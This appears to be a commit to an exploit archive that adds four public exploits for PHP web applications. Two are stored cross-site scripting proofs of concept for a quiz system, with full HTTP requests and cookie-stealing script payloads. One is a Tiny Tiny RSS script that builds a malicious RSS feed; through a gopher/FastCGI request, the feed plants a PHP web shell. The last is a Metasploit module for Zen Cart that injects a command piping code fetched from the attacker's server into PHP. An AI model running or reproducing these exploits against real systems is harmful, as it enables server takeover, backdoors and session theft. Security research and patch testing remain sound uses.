DB: 2021-03-03
4 changes to exploits/shellcodes Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting Tiny Tiny RSS - Remote Code Execution Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting Zen Cart 1.5.7b - Remote Code Execution (Authenticated)
This commit is contained in:
parent
75667550f6
commit
b35005d47b
5 changed files with 402 additions and 0 deletions
42
exploits/php/webapps/49605.txt
Normal file
42
exploits/php/webapps/49605.txt
Normal file
|
@ -0,0 +1,42 @@
|
|||
# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
|
||||
# Date: 2021-03-02
|
||||
# Exploit Author: Praharsh Kumar Singh
|
||||
# Vendor Homepage: https://www.sourcecodester.com
|
||||
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
|
||||
# Software: Web Based Quiz System
|
||||
# Version: 1.0
|
||||
# Vulnerability Type: Cross-site Scripting
|
||||
# Vulnerability: Persistent/Stored XSS
|
||||
# Tested on: Parrot OS
|
||||
|
||||
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
|
||||
# in adding questions in options parameter affected from this vulnerability.
|
||||
# payload: </script><script >alert(document.cookie)</script>
|
||||
|
||||
POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 101
|
||||
Origin: http://localhost
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
|
||||
Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-GPC: 1
|
||||
|
||||
qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
|
||||
|
||||
POC:
|
||||
# go to url http://localhost:8080/admin.php
|
||||
# login and add question
|
||||
# then put the above payload in MCQ options parameter
|
||||
# then fill the remaining details
|
||||
# then click add
|
||||
# go to url http://localhost:8080/login.php
|
||||
# then login to user account
|
||||
# then attempt the quiz while attempting the quiz xss pop up there..!
|
83
exploits/php/webapps/49606.py
Executable file
83
exploits/php/webapps/49606.py
Executable file
|
@ -0,0 +1,83 @@
|
|||
# Exploit Title: Tiny Tiny RSS - Remote Code Execution
|
||||
# Date: 21/09/2020
|
||||
# Exploit Author: Daniel Neagaru & Benjamin Nadarević
|
||||
# Blog post: https://www.digeex.de/blog/tinytinyrss/
|
||||
# Software Link: https://git.tt-rss.org/fox/tt-rss
|
||||
# Version: all before 2020-09-16
|
||||
# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
|
||||
# Tested on: default docker installation method
|
||||
# CVE : CVE-2020-25787
|
||||
|
||||
#!/usr/bin/env python3
|
||||
|
||||
from sys import argv
|
||||
import urllib.parse as ul
|
||||
import base64
|
||||
|
||||
|
||||
def CustomFcgi( filename, output, backdoor):
|
||||
length=len(output)+len(backdoor)+64
|
||||
char=chr(length)
|
||||
|
||||
data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
|
||||
data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
|
||||
data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"
|
||||
|
||||
temp1 = chr(len(data) // 256)
|
||||
temp2 = chr(len(data) % 256)
|
||||
temp3 = chr(len(data) % 8)
|
||||
|
||||
end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
|
||||
end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00"
|
||||
start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"
|
||||
|
||||
payload = start + data + end
|
||||
def get_payload(payload):
|
||||
finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
|
||||
return finalpayload
|
||||
|
||||
return "gopher://localhost:9000/_"+get_payload(get_payload(payload))
|
||||
|
||||
|
||||
|
||||
TTRSS_PATH = "/var/www/html/tt-rss/"
|
||||
BACKDOOR_CODE = """
|
||||
<?php
|
||||
echo "success\n";
|
||||
echo system($_GET['cmd']);
|
||||
?>
|
||||
"""
|
||||
|
||||
|
||||
feed_file = open("malicious_RCE_feed.xml",'w')
|
||||
filename = TTRSS_PATH + "config.php"
|
||||
output = TTRSS_PATH + "backdoor.php"
|
||||
|
||||
backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
|
||||
rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"
|
||||
|
||||
feed ="""<?xml version="1.0" encoding="UTF-8" ?>
|
||||
<rss version="2.0">
|
||||
|
||||
<channel>
|
||||
<title>Exploit demo - rce</title>
|
||||
<link></link>
|
||||
<description>You are getting infected :(</description>
|
||||
<item>
|
||||
<title> Check if there is backdoor.php</title>
|
||||
<link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>
|
||||
<description>
|
||||
<![CDATA[
|
||||
Dummy text
|
||||
|
||||
<img src="{}">
|
||||
|
||||
]]>
|
||||
</description>
|
||||
</item>
|
||||
</channel>
|
||||
</rss>
|
||||
""".format(rce)
|
||||
|
||||
feed_file.write(feed)
|
||||
feed_file.close()
|
60
exploits/php/webapps/49607.txt
Normal file
60
exploits/php/webapps/49607.txt
Normal file
|
@ -0,0 +1,60 @@
|
|||
# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
|
||||
# Date: 2021-03-02
|
||||
# Exploit Author: P.Naveen Kumar
|
||||
# Vendor Homepage: https://www.sourcecodester.com
|
||||
# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
|
||||
# Software : Web Based Quiz System
|
||||
# Version : 1.0
|
||||
# Vulnerability Type : Cross-site Scripting
|
||||
# Vulnerability : Persistent/Stored XSS
|
||||
# Tested on: Windows 10 Pro
|
||||
|
||||
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
|
||||
# in registration form in name parameter affected from this vulnerability.
|
||||
# payload: <script>alert(document.cookie)</script>
|
||||
|
||||
# HTTP POST request
|
||||
POST http://localhost:8080/quiz/register.php HTTP/1.1
|
||||
Host: localhost:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
|
||||
Content-Length: 690
|
||||
Origin: http://localhost:8080
|
||||
Connection: keep-alive
|
||||
Referer: http://localhost:8080/quiz/register.php
|
||||
Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
-----------------------------283640616528311462411171270636
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
<script>alert(document.cookie)</script>
|
||||
-----------------------------283640616528311462411171270636
|
||||
Content-Disposition: form-data; name="email"
|
||||
|
||||
test123@gmail.com
|
||||
-----------------------------283640616528311462411171270636
|
||||
Content-Disposition: form-data; name="password"
|
||||
|
||||
Hacker
|
||||
-----------------------------283640616528311462411171270636
|
||||
Content-Disposition: form-data; name="college"
|
||||
|
||||
hello
|
||||
-----------------------------283640616528311462411171270636
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
|
||||
-----------------------------283640616528311462411171270636--
|
||||
|
||||
POC:
|
||||
# go to url http://localhost:8080/quiz/register.php
|
||||
# then you have to fill the above payload in name/username parameter
|
||||
# then fill the remaining details
|
||||
# then click submit
|
||||
# then login to user account
|
||||
# then attempt any one quiz after attempting go to ranking section then
|
||||
# you can see xss pop up there..!
|
213
exploits/php/webapps/49608.rb
Executable file
213
exploits/php/webapps/49608.rb
Executable file
|
@ -0,0 +1,213 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
###
|
||||
#
|
||||
#
|
||||
# This exploit write payload in database and trig to command
|
||||
# a bug in an zencart v1.5.7b web application
|
||||
#
|
||||
###
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'zencart authenticated remote code execution exploit',
|
||||
'Description' => %q(
|
||||
This exploit module execution os command in zencart.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['Mucahit Saratar <trregen222@gmail.com>'], # msf module & research & poc
|
||||
'References' =>[
|
||||
[ 'OSVDB', '' ],
|
||||
[ 'EDB', '' ],
|
||||
[ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
|
||||
[ 'CVE', '2021-3291']
|
||||
],
|
||||
'Platform' => 'php',
|
||||
'Privileged' => false,
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [ ['Automatic', { }] ],
|
||||
'DisclosureDate' => '2021-01-22',
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
|
||||
OptString.new('PASSWORD', [ true, 'Password to login with', '']),
|
||||
OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
|
||||
OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
|
||||
OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
|
||||
OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def start_server
|
||||
ssltut = false
|
||||
if datastore["SSL"]
|
||||
ssltut = true
|
||||
datastore["SSL"] = false
|
||||
end
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
on_request_uri(cli, req)
|
||||
},
|
||||
'Path' => resource_uri
|
||||
}})
|
||||
print_status("payload is on #{get_uri}")
|
||||
@adresim = get_uri
|
||||
datastore['SSL'] = true if ssltut
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_good('First stage is executed ! Sending 2nd stage of the payload')
|
||||
send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
def tabanyol
|
||||
datastore["BASEPATH"]
|
||||
end
|
||||
|
||||
def isim
|
||||
datastore["USERNAME"]
|
||||
end
|
||||
|
||||
def parola
|
||||
datastore["PASSWORD"]
|
||||
end
|
||||
|
||||
|
||||
def login
|
||||
#"index.php?cmd=login&camefrom=index.php"
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
|
||||
'vars_get' => {
|
||||
'cmd' => 'login',
|
||||
'camefrom' => 'index.php'
|
||||
})
|
||||
# <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
|
||||
unless res
|
||||
fail_with(Failure::Unreachable, "Access web application failure")
|
||||
end
|
||||
if res.code != 200
|
||||
fail_with(Failure::Unreachable, "we not have 200 response")
|
||||
end
|
||||
|
||||
if !res.get_cookies.empty?
|
||||
@cookie = res.get_cookies
|
||||
@csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
|
||||
if @csrftoken.empty?
|
||||
fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
|
||||
end
|
||||
vprint_good("login Csrf token: "+@csrftoken)
|
||||
end
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
|
||||
'cookie' => @cookie,
|
||||
'vars_post' => {
|
||||
'securityToken' => @csrftoken,
|
||||
'action' => "do"+@csrftoken,
|
||||
'admin_name' => isim,
|
||||
'admin_pass' => parola
|
||||
})
|
||||
if res.code != 302
|
||||
fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
|
||||
end
|
||||
true
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
unless login
|
||||
fail_with(Failure::UnexpectedReply, 'Wrong credentials')
|
||||
return CheckCode::NotVulnerable('Wrong credentials')
|
||||
end
|
||||
print_good("We loged in")
|
||||
Exploit::CheckCode::Vulnerable
|
||||
CheckCode::Vulnerable('Authenticated successfully')
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
check
|
||||
start_server
|
||||
sleep(4)
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
|
||||
'vars_get' => {
|
||||
'cmd' => 'modules',
|
||||
'set' => datastore["MODULE"],
|
||||
'module' => datastore["SETTING"],
|
||||
'action' => 'edit'
|
||||
},
|
||||
'cookie' => @cookie
|
||||
)
|
||||
if res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
|
||||
end
|
||||
# <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
|
||||
if res && res.code == 200
|
||||
@formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
|
||||
if @formtoken.empty?
|
||||
fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
|
||||
end
|
||||
#print_good(@formtoken)
|
||||
# <form name="modules"
|
||||
@radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/)
|
||||
@selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/)
|
||||
@textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/)
|
||||
@secme = {}
|
||||
@secme["securityToken"] = @formtoken
|
||||
for @a in @radiolar
|
||||
@secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //"
|
||||
end
|
||||
for @a in @selectler
|
||||
@secme["configuration[#{@a[0]}]"] = "0"
|
||||
end
|
||||
for @a in @textarr
|
||||
@secme["configuration[#{@a[0]}]"] = "0"
|
||||
end
|
||||
print_good(@secme.to_s)
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
|
||||
'cookie' => @cookie,
|
||||
'vars_get' => {
|
||||
'cmd' => 'modules',
|
||||
'set' => datastore["MODULE"],
|
||||
'module' => datastore["SETTING"],
|
||||
'action' => 'save'
|
||||
},
|
||||
'vars_post' => @secme
|
||||
)
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
|
||||
'vars_get' => {
|
||||
'cmd' => 'modules',
|
||||
'set' => datastore["MODULE"],
|
||||
'module' => datastore["SETTING"],
|
||||
'action' => 'edit'
|
||||
},
|
||||
'cookie' => @cookie
|
||||
)
|
||||
|
||||
end
|
||||
end
|
||||
end
|
|
@ -43793,3 +43793,7 @@ id,file,description,date,author,type,platform,port
|
|||
49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",2021-03-01,Photubias,webapps,multiple,
|
||||
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
|
||||
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
|
||||
49605,exploits/php/webapps/49605.txt,"Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting",2021-03-02,"Praharsh Kumar Singh",webapps,php,
|
||||
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",2021-03-02,"Daniel Neagaru",webapps,php,
|
||||
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",2021-03-02,"P.Naveen Kumar",webapps,php,
|
||||
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue